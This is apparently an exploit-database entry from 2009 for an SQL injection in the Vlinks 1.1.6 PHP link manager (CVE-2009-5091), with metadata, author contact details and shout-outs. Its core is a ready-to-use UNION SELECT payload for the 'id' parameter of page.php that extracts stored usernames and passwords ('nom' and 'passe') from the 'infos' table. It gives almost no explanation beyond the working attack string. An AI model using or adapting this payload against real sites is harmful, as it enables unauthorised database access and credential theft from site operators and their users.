Vlinks 1.1.6 - 'id' SQL Injection
Author: JIKO
type: webapps
platform: php
port:
date_added: 2009-02-12
date_updated: 2017-02-13
verified: 1
codes: OSVDB-51988;CVE-2009-5091
tags:
aliases:
screenshot_url:
application_url:
#########################################################################################
[!x!] Informations:
Name : vlinks
Download : http://www.vlinks.org/ =>http://www.vlinks.org/vlinks-v1.1.6.rar
Vulnerability : Sql Injection
Author : JIKO(JAWAD)
Contact : jalikom@hotmail.com
Site : No-ExploiT.CoM/Forum (langague arabic)
Notes : 3arabi Muslim Maghribi (bladi blad lmgharba kamlin Dini Din lmsalmin Kamlin)
#########################################################################################
[!x!] Bug:
Bugged file is /[path]/page.php?
[Note]
Pass Simple
[/Note]
#########################################################################################
[!x!] Exploit:
Exploit: http://no-exploit.com/forum/page.php?nc=vbvb&id=-1 union select 0,concat(nom,0x3a,passe),2,3+from+infos--
########################################################################################
[!x!] To: Ùلسطين الØرة
Cyber-Zone(Abdelkhalek) ,Hussin X ,leopard ,FrFoRHaCKeR ,ShBh BaGhDaD ,RoMyOoOo
members [No-exploit.Com]
# milw0rm.com [2009-02-13]